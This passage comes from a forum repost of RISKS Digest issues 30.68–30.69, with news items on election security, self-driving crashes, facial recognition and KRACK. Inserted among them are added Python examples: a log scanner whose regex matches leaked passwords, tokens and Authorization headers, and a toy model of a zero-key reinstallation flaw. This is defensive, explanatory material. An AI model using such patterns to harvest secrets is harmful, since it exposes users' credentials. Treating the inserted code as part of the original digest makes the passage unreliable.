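    r'(?i)"?(pass(?:word|wd)?|secret|token|api[_-]?key|authorization)"?\s*[=:]\s*"?([^"&\s,}]+)')


def find_credential_leaks(lines):
    """Return (line_no, field) for every credential-shaped value that is not
    already a redaction placeholder. Use it over logs written before the fix."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in LEAK.finditer(line):
            if m.group(2) != PLACEHOLDER:
                hits.append((n, m.group(1).lower()))
    return hits


# Constructed log lines: a raw form leak, an already-redacted record, a header leak.
SAMPLE_LOG = [
    "2018-05-01T10:00:00Z INFO http_request path=/login user=alice password=hunter2",
    '2018-05-01T10:00:01Z INFO {"event": "http_request", "form": {"password": "[REDACTED]"}}',
    "2018-05-01T10:00:02Z DEBUG headers Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.x",
]


if __name__ == "__main__":
    out = []
    print(log_request("/login", {"user": "alice", "password": "hunter2"},
                      {"Cookie": "sid=abc", "Accept": "*/*"}, out.append))
    print(find_credential_leaks(SAMPLE_LOG))   # -> [(1, 'password'), (3, 'authorization')]
```

The key-name match is deliberately broad (it will also mask a harmless field called `session_timeout`); over-redaction is the safe direction, and an allowlist of fields you actually want in the log is the stricter alternative. Redaction at the sink is a safety net, not the fix: the record should never have carried the credential, and both incidents were found by the company, not reported by a scanner, which is the argument for running the scan against archived logs before assuming "no indication of misuse".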

    Date: Fri, 04 May 2018 14:15:59 +0000
    From: John Ohno <john...@gmail.com>
    Subject: Against Trendism: how to defang the social media disinformation
    complex (Medium)



    There's an essential mistake that almost every social media platform makes
    -- one inherited from marketing (where it makes some sense), and one that is
    mostly unexamined and unaccounted-for even in otherwise fairly
    socially-conscious projects like Mastodon and Diaspora. In almost every one
    of these systems, incentives exist that confuse popularity with value.

    I call this *trendism* -- the belief that an already-trending topic deserves
    to be promoted.

    In marketing, because the piece of information being spread is intended to
    sell a product, the spread of that information is, in fact, theoretically
    proportional to its value. In social media, the information being spread is
    not a piece of advertising, and while most of these systems have revenue
    models based on advertising, that advertising is generated on the fly based
    on the viewer's browsing history and has nothing to do with the content of
    the piece of information being spread.

    The thing is, ideas travel in packs. When we encounter one idea, we tend to
    see its nearest neighbours also. When we find out something new, our friends
    hear about it too. So, trending posts are rarely surprising: by the very
    nature of their popularity, they are already familiar in their essence to
    most of the people who are directed toward them.

    The information content of a message, in Claude Shannon's formulation, is
    proportional to its deviation from expectation -- information is surprise.
    Kolgorov's [Kolmogorov? PGN] formulation is similar: information content
    proportional to the smallest possible message that could say the same thing
    (which, of course, includes references to earlier messages or prior
    knowledge as a possible tactic).

    In other words, from an information-theoretic perspective, a post that only
    tells you things you already know is worthless. Yet, trending content is
    almost always composed solely of things the viewer has already seen.

    There's one piece of information that a copy of a viral post actually has --
    the association between the content of the post and the person posting it.
    We share posts we've already seen as a way of expressing our identity, both
    personally and within a group. That is the only form of information valued
    by trending-oriented systems: tribal affiliation.

    If we want to force our social media platforms into information-rich
    environments and lower the amount of tribal rivalry we are exposed to, there
    are a couple general-purpose solutions, and they all come down to
    kneecapping the machinery of trendism.

    1. Rather than block political content (only one kind of tribalist
    content, and one that is at least theoretically grounded in genuine
    philosophical differences about the ideal shape of the world, rather than
    geography or social groups), we should block all shared content. Remove
    retweets and shares from your feed entirely. Most of them are things you
    have already seen, and most of the rest don't contain meaningful or useful
    information.

    2. Emotionally-manipulative posts get the most engagement, and are
    therefore ranked higher in feeds. (I don't want to be emotionally
    manipulated. Do you?)* To defeat this ranking, force your feed to
    reverse-chronological order. To filter out emotionally-manipulative posts,
    filter out anything with more than a set number of interactions.

    3. Avoid being part of the problem. Before sharing, determine: is the
    information true? Is it new? Is it playing mostly on my emotions? If
    possible, delay your sharing for a long period of time -- read an article,
    and then wait a few hours, or even a few days, before deciding whether or
    not it is of sufficient quality to actually re-post.

    4. Identify when you are being drawn into heated arguments, and ignore
    them. In the heat of the moment, you're not actually making good points
    anyhow, and you're more likely to misunderstand or misrepresent your
    opponent. The suggestions from #3 apply here too for comments -- make sure
    your comments are accurate, informative, and cool, even if that means
    waiting several days to respond. Never let the system rush you.

    5. Visible metrics gamify trendism. Remove them.

    Most social media platforms don't make it easy to follow this advice.
    Mastodon is closest -- it hides metrics from the timeline by default,
    supports only reverse-chronological post ordering, and allows you to filter
    all boosts from your timeline. For everything else, you will need to use
    browser extensions.

    Facebook Demetricator ... and Twitter Demetricator [...]
    [Truncated for RISKS. PGN]
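    The five rules above as an added worked example in Python (not from the article, and not Mastodon's or any Demetricator's code): a feed filter that drops shares and high-engagement posts, orders the rest strictly reverse-chronologically and returns no metrics (rules 1, 2 and 5), plus a cooling-off queue for rule 3. The sample posts, authors and threshold are constructed.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone


@dataclass
class Post:
    author: str
    text: str
    posted_at: datetime
    interactions: int        # likes + shares + replies: the visible metric (rule 5)
    is_share: bool = False   # a retweet/boost of someone else's post (rule 1)


def filter_feed(posts: list[Post], max_interactions: int = 50) -> list[tuple[str, str]]:
    """Rules 1, 2 and 5: drop shares, drop anything above the interaction
    threshold, sort strictly reverse-chronologically, return no metrics."""
    kept = [p for p in posts if not p.is_share and p.interactions <= max_interactions]
    kept.sort(key=lambda p: p.posted_at, reverse=True)
    return [(p.author, p.text) for p in kept]


@dataclass
class ShareQueue:
    """Rule 3: nothing saved here can be re-posted until the cooling-off period has passed."""
    cooling_off: timedelta = timedelta(hours=24)
    _pending: list[tuple[Post, datetime]] = field(default_factory=list)

    def save(self, post: Post, saved_at: datetime) -> None:
        self._pending.append((post, saved_at))

    def due(self, now: datetime) -> list[Post]:
        """Posts old enough to be reconsidered; whether they are true, new and
        not merely emotive is still the reader's call."""
        return [p for p, saved_at in self._pending if now - saved_at >= self.cooling_off]


T0 = datetime(2018, 5, 4, 12, 0, tzinfo=timezone.utc)   # constructed reference time


def sample_feed() -> list[Post]:
    # Constructed sample posts, not real ones.
    return [
        Post("ann", "Notes from tonight's water board meeting", T0 + timedelta(hours=1), 3),
        Post("bob", "RT: the outrage thread everyone has already seen", T0 + timedelta(hours=2), 4000, is_share=True),
        Post("cat", "You will NOT BELIEVE what they did", T0 + timedelta(hours=3), 900),
        Post("dan", "Bug report: our CI cache key ignores the lockfile", T0 + timedelta(hours=4), 12),
        Post("eve", "Photo from the trailhead this morning", T0 + timedelta(minutes=30), 0),
    ]


def demo_queue(hours_later: int) -> list[str]:
    """Save the first sample post at T0 and return who is due for re-posting `hours_later` on."""
    queue = ShareQueue()
    queue.save(sample_feed()[0], saved_at=T0)
    return [p.author for p in queue.due(T0 + timedelta(hours=hours_later))]


if __name__ == "__main__":
    for author, text in filter_feed(sample_feed()):
        print(f"{author}: {text}")
    print("due after 23h:", demo_queue(23))
    print("due after 24h:", demo_queue(24))
```

    The threshold does the work of rule 2: a post that has already drawn hundreds of interactions is, by the article's argument, almost certainly something the reader has seen. Lowering `max_interactions` trades reach for surprise.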

    ------------------------------

    Date: Sat, 5 May 2018 10:58:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Letter to *Consumer Reports* responding to June article about
    connected cars.

    Your otherwise-excellent article on data-hoovering connected cars doesn't
    mention the downside of manufacturers being able to update automobile
    software: risking bad updates and (worse) hackers abusing update
    mechanisms. Anyone who's endured PC/phone/tablet problems with vendor
    patches -- even had devices "bricked" (made useless) -- should be terrified
    of car updates made without owner permission. And everyone aware of today's
    hacking environment should refuse to purchase anything without understanding
    and consenting to its update mechanism.

    ------------------------------

    Date: Tue, 10 Jan 2017 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.68
    ************************
  2. LakeGator

    Risks Digest 30.69

    RISKS List Owner

    May 16, 2018 8:35 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Wednesday 16 May 2018 Volume 30 : Issue 69

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    America continues to ignore the risks of election hacking
    (The New Yorker)
    Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)
    Virginia election officials assigned 26 voters to the wrong district
    (WashPo)
    Securing Elections (Bruce Schneier)
    Australian Emergency Calls Fail due to lightning strike (ABC AU)
    Self-driving cars' shortcomings revealed in DMV reports (Merc)
    VW bugs: "Unpatchable" remote code pwnage (TechBeacon)
    Software bug led to death in Uber's self-driving crash (Ars Technica)
    Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)
    Is technology bringing history to life or distorting it? (WashPo)
    2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)
    KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)
    Nigerian Email Scammers Are More Effective Than Ever (WiReD)
    Dark code (DW)
    Postmortem of Fortnite Service Outage (Epic Games)
    Collateral damage (538)
    Dozens of security cameras hacked in Japan (Mainichi)
    Technology turns our cities into spies for ICE, whether we like it or not
    (LATimes)
    The Digital Vigilantes Who Hack Back (The New Yorker)
    Bring in the Nerds: EFF Introduces Actual Encryption Experts to U.S. Senate
    Staff (EFF)
    Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)
    Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)
    Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)
    Buckle Up, Prime Members: Amazon Launches In-Car Delivery (Business Wire)
    Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)
    Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)
    During disasters, active Twitter users likely to spread falsehoods:
    Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)
    Face recognition police tools 'staggeringly inaccurate' (BBC.com)
    Intel Documentation Blamed for Multiple Operating System Security Flaws
    (IT Pro)
    The Problem with Chinese GPS (Now I Know)
    U.S. identifies suspect in major leak of CIA hacking tools (WashPo)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 7 May 2018 22:11:57 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: America continues to ignore the risks of election hacking
    (The New Yorker)

    America Continues to Ignore the Risks of Election Hacking | The New Yorker

    "America's voting systems are hackable in all kinds of ways. As a case
    in point, in 2016, the Election Assistance Commission, the bipartisan
    federal agency that certifies the integrity of voting machines, and
    that will now be tasked with administering Congress's three hundred
    and eighty million dollars, was itself hacked. The stolen data --
    log-in credentials of EAC staff members -- were discovered, by chance,
    by employees of the cybersecurity firm Recorded Future, whose
    computers one night happened upon an informal auction of the stolen
    passwords. ``This guy -- we randomly called him Rasputin -- was in a
    high-profile forum in the darkest of the darkest of the darkest corner
    of the dark Web, where hackers and reverse engineers, ninety-nine per
    cent of them Russian, hang out,'' Christopher Ahlberg, the CEO of
    Recorded Future, told me. ``There was someone from another country in
    the forum who implied he had a government background, and he wanted to
    get his hands on this stuff. That's when we decided we would just buy
    it. So we did, and took it to the government'' -- the U.S. government
    -- ``and the sale ended up being thwarted.'' (Ahlberg wouldn't
    identify which government agency his company had turned the data over
    to. The EAC, in a statement, referred questions about ``the
    investigation or information shared with the government by Recorded
    Future'' to the FBI The FBI, through a Justice Department
    spokesperson, declined to comment.)"

    ------------------------------

    Date: Tue, 8 May 2018 22:00:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)

    Russia Tried to Undermine Confidence in Voting Systems, Senators Say

    ------------------------------

    Date: Mon, 14 May 2018 00:55:08 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Virginia election officials assigned 26 voters to the wrong district
    (WashPo)

    More than two dozen voters cast ballots in the wrong race. They were among
    6,000 misassigned voters across the state. It might've cost Democrats a
    pivotal race.

    Va. election officials assigned 26 voters to the wrong district. It might’ve cost Democrats a pivotal race.

    ------------------------------

    Date: Tue, 15 May 2018 00:07:08 -0500
    From: Bruce Schneier <schn...@schneier.com>
    Subject: Securing Elections

    (PGN-excerpted from Bruce's CRYPTO-GRAM, 15 May 2018)

    Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them.

    [This is a long item, perhaps intended for non-RISKS readers.
    Nevertheless, it is highly relevant and timely. The full article is at
    Schneier on Security: Crypto-Gram
    PGN]

    ------------------------------

    Date: Sun, 6 May 2018 01:54:31 +0000
    From: John Colville <John.C...@uts.edu.au>
    Subject: Australian Emergency Calls Fail due to lightning strike (ABC AU)

    Calls to 000 (the Australian emergency phone number) failed across large areas of Australia on May 04 2018.

    Government to investigate Telstra triple-0 outage after emergency calls go unanswered

    Government to conduct investigation into Telstra triple-0 outage

    ------------------------------

    Date: Thu, 3 May 2018 15:51:21 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Self-driving cars' shortcomings revealed in DMV reports (Merc)

    NNSquad
    http://www.mercurynews.com/2018/05/01/self-driving-cars-shortcomings-revealed-in-dmv-reports/

    The disengagement reports themselves identify other problems some
    self-driving vehicles struggle with, for example heavy pedestrian traffic
    or poorly marked lanes. In describing the events that caused their backup
    drivers to take the controls, the companies have provided a new window
    into the road-worthiness -- or not -- of their cars and systems. Baidu, a
    Chinese Internet-search giant, reported a case in which driver had to take
    over because of a faulty steering maneuver by the robot car; several cases
    of "misclassified" traffic lights; a failure to yield for cross traffic;
    delayed braking behind a car that cut quickly in front; drifting out of a
    lane; and delayed perception of a pedestrian walking into the street.

    ------------------------------

    Date: Sat, 12 May 2018 02:29:16 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: VW bugs: "Unpatchable" remote code pwnage (TechBeacon)

    Two security researchers have excoriated Volkswagen Group for selling
    insecure cars. As in: hackable-over-the-Internet insecure.

    They broke into a recent-model VW and an Audi, via the cars' Internet
    connections, and were able to jump from system to system, running arbitrary
    code. Worryingly, they fully pwned the unauthenticated control bus connected
    to some safety-critical systems -- such as the cruise control.

    But VW has no way to push updates to its cars, and won't alert owners to
    visit a dealer for an update.

    http://techbeacon.com/vw-bugs-unpatchable-remote-code-pwnage

    ------------------------------

    Date: Mon, 7 May 2018 15:27:41 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Software bug led to death in Uber's self-driving crash (Ars Technica)

    NNSquad
    http://arstechnica.com/tech-policy/...bug-led-to-death-in-ubers-self-driving-crash/

    The fatal crash that killed pedestrian Elaine Herzberg in Tempe, Arizona,
    in March occurred because of a software bug in Uber's self-driving car
    technology, The Information's Amir Efrati reported on Monday. According to
    two anonymous sources who talked to Efrati, Uber's sensors did, in fact,
    detect Herzberg as she crossed the street with her bicycle.
    Unfortunately, the software classified her as a "false positive" and
    decided it didn't need to stop for her. Distinguishing between real
    objects and illusory ones is one of the most basic challenges of
    developing self-driving car software. Software needs to detect objects
    like cars, pedestrians, and large rocks in its path and stop or swerve to
    avoid them. However, there may be other objects -- like a plastic bag in
    the road or a trash can on the sidewalk -- that a car can safely ignore.
    Sensor anomalies may also cause software to detect apparent objects where
    no objects actually exist.

    [Also noted by Wendy Grossman: Classic case of where you set the
    positive/negative error rate tradeoffs in the classifier, but with the
    consequences amped up because it's a car on public roads, not a bit of
    software deciding between cats and giraffes: if you set the threshold
    too low the car stops (and jolts its passengers) for every plastic bag
    and shadow. If you set it too high...you get deaths. I wouldn't really
    call that a bug; I'd call it an experimental error. So besides the
    risks inherent in deciding where you set the threshold, there's the
    risk of allowing companies like Uber to run their experiments on public
    roads.]
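    The threshold trade-off in the bracketed note above, as an added example in Python (not Uber's classifier and not from the article): a sweep over confidence thresholds on a constructed set of labelled detections, costing a missed hazard and a needless stop separately. With equal costs (the cats-versus-giraffes case) the optimum ignores more; once a miss is weighted far above a jolt, the optimum moves to a low threshold that stops for the plastic bags. All detections, thresholds and costs are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Detection:
    confidence: float   # classifier's belief that the object is a real obstacle
    is_hazard: bool     # ground truth: True = must stop (a pedestrian), False = safe to ignore (a bag)


# Constructed sample detections for this example; not data from the Uber incident.
DETECTIONS = [
    Detection(0.95, True), Detection(0.80, True), Detection(0.62, True), Detection(0.40, True),
    Detection(0.75, False), Detection(0.70, False), Detection(0.55, False),
    Detection(0.35, False), Detection(0.20, False), Detection(0.10, False),
]
THRESHOLDS = [0.1, 0.3, 0.5, 0.7, 0.9]


def errors_at(detections, threshold):
    """Treat every detection below `threshold` as a false positive and ignore it.
    Returns (missed_hazards, false_stops)."""
    missed = sum(1 for d in detections if d.is_hazard and d.confidence < threshold)
    false_stops = sum(1 for d in detections if not d.is_hazard and d.confidence >= threshold)
    return missed, false_stops


def expected_cost(detections, threshold, cost_miss, cost_stop):
    """Total cost of operating at `threshold` under the given per-error costs."""
    missed, false_stops = errors_at(detections, threshold)
    return missed * cost_miss + false_stops * cost_stop


def best_threshold(detections, thresholds, cost_miss, cost_stop):
    """Threshold minimising expected cost; ties go to the lower (more cautious) threshold."""
    return min(thresholds, key=lambda t: (expected_cost(detections, t, cost_miss, cost_stop), t))


def sweep(detections, thresholds, cost_miss, cost_stop):
    """One row per threshold: (threshold, missed_hazards, false_stops, cost)."""
    return [(t, *errors_at(detections, t), expected_cost(detections, t, cost_miss, cost_stop))
            for t in thresholds]


if __name__ == "__main__":
    # Cats vs. giraffes: both error types cost the same, so the optimum is wherever
    # total mistakes are fewest, even if that means ignoring real hazards.
    print("symmetric  ->", best_threshold(DETECTIONS, THRESHOLDS, cost_miss=1, cost_stop=1))
    # Public road: a missed pedestrian is catastrophic, a needless stop is a jolt.
    print("asymmetric ->", best_threshold(DETECTIONS, THRESHOLDS, cost_miss=1000, cost_stop=1))
    for row in sweep(DETECTIONS, THRESHOLDS, cost_miss=1000, cost_stop=1):
        print("thr=%.1f missed=%d false_stops=%d cost=%d" % row)
```

    The point the note makes is visible in the two results: the classifier is the same in both runs, and only the cost assigned to each kind of error changes where the threshold should sit.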

    ------------------------------

    Date: Sun, 13 May 2018 13:35:53 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)

    The New York Times
    http://mobile.nytimes.com/2018/05/1...less-cars-and-their-carbon-monoxide-toll.html

    "It seems like a common convenience in a digital age: a car that can be
    powered on and off with the push of a button, rather than the mechanical
    turning of a key. But it is a convenience that can have a deadly effect.

    "On a summer morning last year, Fred Schaub drove his Toyota RAV4 into the
    garage attached to his Florida home and went into the house with the
    wireless key fob, evidently believing the car was shut off. Twenty-nine
    hours later, he was found dead, overcome with carbon monoxide that flooded
    his home while he slept. '``After 75 years of driving, my father thought
    that when he took the key with him when he left the car, the car would be
    off,'' said Mr. Schaub's son Doug.'

    Adoption of technological convenience carries transition risk. The article
    discusses a wrongful death lawsuit boosted by internal Toyota memos that
    discovered recommendations to integrate audible and visual warnings when
    the engine remains active with no key fob inside the vehicle. This
    recommendation was 86'd from implementation. Over 20 people have perished
    from vehicle-generated CO poisoning since 2006.

    ------------------------------

    Date: Sun, 13 May 2018 16:34:51 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)

    http://www.straitstimes.com/asia/south-asia/the-risk-from-robot-weapons-the-statesman-contributor

    'A letter warning against the coming race of these weapons was signed in
    2015 by over 1,000 AI experts.'

    'Peter Singer, an expert on future warfare at 'New America', a think tank,
    has said that very powerful forces propel the AI arms race - geopolitical
    compulsions, scientific advances and profit-seeking high technology
    companies.

    'Scharre has also raised the possibility that perhaps because of badly
    written codes or perhaps because of cyber attack by an adversary, military
    use autonomous systems can malfunction, raising possibilities of attack on
    people or soldiers on the same side, or escalating conflicts or killing to
    unintended, highly exaggerated levels.'

    Numerous public proclamations admonishing on AV weapon risks are
    insufficient to deter investment and capability pursuit. There's apparently
    too much momentum among businesses and governments to deflect this
    juggernaut.

    With the Manhattan Project, scientific leadership recognized the risks
    nuclear weapons raised. Some scientists argued for a demonstration, rather
    than deployment, to compel quick Japanese surrender. Nagasaki and Hiroshima
    were destroyed to temporarily establish and project US nuclear hegemony as a
    deterrent.

    Aggressive international diplomacy among progressive governments might
    negotiate a non-proliferation of autonomous weaponry treaty (NPAWT), like
    the Treaty on the Non-Proliferation of Nuclear Weapons (NPT). However,
    an enforceable and verifiable treaty is unlikely to emerge in time given
    historical human proclivity and myopia, despite empirical evidence that
    argues for deliberate restraint and negotiation.

    [A timely reminder on the importance of negotiation to cut the risk of
    war can be found here
    (http://www.nytimes.com/2018/05/11/opinion/nuclear-doomsday-denial.html).]

    ------------------------------

    Date: Sun, 13 May 2018 17:22:56 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    *The Washington Post*

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    "Whatever its shortcomings, the Kennedy speech is just the latest way that
    history is being digitally re-created, updated and manipulated as never
    before. From meticulously colorized photographs to immersive
    virtual-reality battlefields, scholars, artists and entrepreneurs are
    dragging the old days into the computer age. And scholastic standards are
    straining to keep up.

    "The U.S. Military Academy is working on a phone-based app along the lines
    of Pokemon Go that will let visitors see how George Washington's troops
    strung a massive iron chain across the Hudson River. A team in North
    Carolina has synthesized an important but unrecorded 1960 speech by Martin
    Luther King Jr., acoustically accurate down to the echoes in the Durham
    church."

    Simulation capability has improved to the point where a political leader can
    be used to construct a fictitious speech which appears authentic, with the
    power to convince an enraptured audience. This capability, if exploited by
    mendacious political entities, can accelerate democracy's decline.

    Publication of false and misleading political speech, especially by elected
    authorities, empowers authoritarianism. Current political discourse in the
    US is heavy with misleading facts and falsehoods that confuse public
    sentiment. This manipulation distracts attention from government's intent to
    apparently conceal a hidden political agenda. Exactly what the agenda is,
    beyond "pay for play," is difficult to divine.

    The introduction of bots applied for this purpose introduces an asymmetric
    multiplier for dissembled political discourse. By the time a policy becomes
    apparent through executive enforcement, the bots will have buried the policy
    agenda into a messaging morass that will potentially overwhelm any
    independent observer's (the free press) ability to analyze. The result is
    likely to suppress litigation that thwarts ill-conceived public policy that
    exclusively benefits "payers."

    ------------------------------

    Date: Sat, 5 May 2018 11:51:07 +0200
    From: Alberto Cammozzo <ac+...@zeromx.net>
    Subject: 2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)

    (via Diego Latella)

    More than 2,000 people were wrongly identified as possible criminals by
    facial scanning technology at the 2017 Champions League final in Cardiff.
    South Wales Police used the technology as about 170,000 people were in
    Cardiff for the Real Madrid v Juventus game. But out of the 2,470 potential
    matches with custody pictures - 92% - or 2,297 were wrong.

    Chief Constable Matt Jukes said officers "did not take action" and no one
    was wrongly arrested.

    South Wales Police have made 450 arrests in the last nine months using the
    automatic facial recognition (AFR) software, which scans faces comparing
    them to about 500,000 custody images.

    http://www.bbc.co.uk/news/technolog...d5b45569c1|40779d3379c44626b8bf140c4d5e9075|1

    ------------------------------

    Date: Sun, 6 May 2018 15:15:31 +0100
    From: Wols Lists <antl...@youngman.org.uk>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)

    Actually, I believe it exploits a flaw in the most common IMPLEMENTATION
    of the protocol.

    For security reasons, once the key has been checked the first time, the
    recipient forgets it (over-writes it with 0s), so if the attacker can
    interrupt the handshake at that point, they can resend a key of all zeros
    and authenticate.

    The receiver should either abort the handshake completely, or not
    forget the key until the handshake is complete.
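    A toy model of the behaviour described in this post, added here as an example (not Wi-Fi or WPA2 code, not from the post, and not any real supplicant's logic): a receiver that installs a key on message 3 and, under the "vulnerable" policy, wipes its working copy straight away, so a repeated message 3 reinstalls all zeros. The other two policies are the two fixes the post names: abort the handshake on a repeat, or keep the working copy until the handshake has completed. Key derivation, nonces, message names and policy names are constructed.

```python
import hashlib
from dataclasses import dataclass, field
from typing import Optional

KEY_LEN = 16
ZERO_KEY = bytes(KEY_LEN)


def derive_key(a_nonce: bytes, s_nonce: bytes) -> bytes:
    """Constructed stand-in for the real key derivation; not the 802.11i PRF."""
    return hashlib.sha256(b"toy-ptk|" + a_nonce + b"|" + s_nonce).digest()[:KEY_LEN]


@dataclass
class Receiver:
    policy: str                            # "vulnerable" | "keep_until_complete" | "abort"
    pending: Optional[bytes] = None        # key material held while the handshake runs
    installed: Optional[bytes] = None      # key handed to the traffic cipher
    complete: bool = False
    log: list = field(default_factory=list)

    def on_msg1(self, a_nonce: bytes, s_nonce: bytes) -> None:
        self.pending = derive_key(a_nonce, s_nonce)
        self.log.append("key derived")

    def on_msg3(self) -> None:
        """Message 3 carries the key confirmation; it may be delivered more than once."""
        if self.pending is None:
            self.log.append("msg3 before derivation: ignored")
            return
        if self.installed is not None:
            if self.policy == "abort":
                self.log.append("repeated msg3: handshake aborted")
                self.pending = self.installed = None
                self.complete = False
                return
            if self.complete:
                self.log.append("repeated msg3 after completion: ignored")
                return
        self.installed = self.pending
        self.log.append("key installed")
        if self.policy == "vulnerable":
            # Wipe the working copy immediately "for security": a later msg3 will
            # reinstall whatever is left here, which is now all zeros.
            self.pending = ZERO_KEY

    def finish(self) -> None:
        """Handshake complete: only now is it safe to wipe the working copy."""
        self.complete = True
        self.pending = ZERO_KEY


def run_scenario(policy: str, interrupted: bool = True) -> Receiver:
    """Drive a receiver through msg1, msg3 and a repeated msg3; `interrupted`
    means the repeat arrives before the handshake could complete."""
    r = Receiver(policy)
    r.on_msg1(a_nonce=b"A" * 8, s_nonce=b"S" * 8)   # nonces are constructed
    r.on_msg3()
    if not interrupted:
        r.finish()
    r.on_msg3()
    return r


def key_in_use(policy: str, interrupted: bool = True) -> Optional[bytes]:
    """The key the receiver ends up using for traffic, or None if it aborted."""
    return run_scenario(policy, interrupted).installed


if __name__ == "__main__":
    for policy in ("vulnerable", "keep_until_complete", "abort"):
        k = key_in_use(policy)
        state = "NONE (aborted)" if k is None else ("ALL ZEROS" if k == ZERO_KEY else "real key")
        print(f"{policy:20s} -> {state}")
```

    The lesson is about state, not cryptography: zeroising secrets is good hygiene only once no later step can still read the zeroed buffer, so the wipe belongs at the end of the handshake, and a repeat of an already-consumed message must be treated as an error rather than re-processed.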

    ------------------------------

    Date: Sun, 6 May 2018 22:54:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Nigerian Email Scammers Are More Effective Than Ever (WiReD)

    You would think that after decades of analyzing and fighting email spam,
    there'd be a fix by now for the Internet's oldest hustle -- the Nigerian
    Prince scam. There's generally more awareness that a West African noble
    demanding $1,000 in order to send you millions is a scam, but the underlying
    logic of these -- pay a little, get a lot -- schemes, also known as 419
    fraud, still ensnares a ton of people. In fact, groups of fraudsters in
    Nigeria continue to make millions off of these classic cons. And they
    haven't just refined the techniques and expanded their targets -- they've
    gained minor celebrity status for doing it.

    http://www.wired.com/story/nigerian-email-scammers-more-effective-than-ever

    ------------------------------

    Date: Sun 6 May 2018 11:12:58 -0000
    From: "Wendy M. Grossman" <wen...@pelicancrossing.net>
    Subject: Dark code (DW)

    In the wake of the TSB computing disaster, DW has a long piece on the
    legacy code that runs banking systems, so old that no one understands it any
    more. The problem: you can't stay in business without updating, and updating
    it breaks things.

    Ellen Ullman has often written about this -- see for example 1997's Close to
    the Machine and her more recent sort-of-sequel.

    http://m.dw.com/en/fail-by-design-bankings-legacy-of-dark-code/a-43645522

    ------------------------------

    Date: Sun, 6 May 2018 13:36:41 -0400
    From: Monty Solomon <mo...@roscom.com>
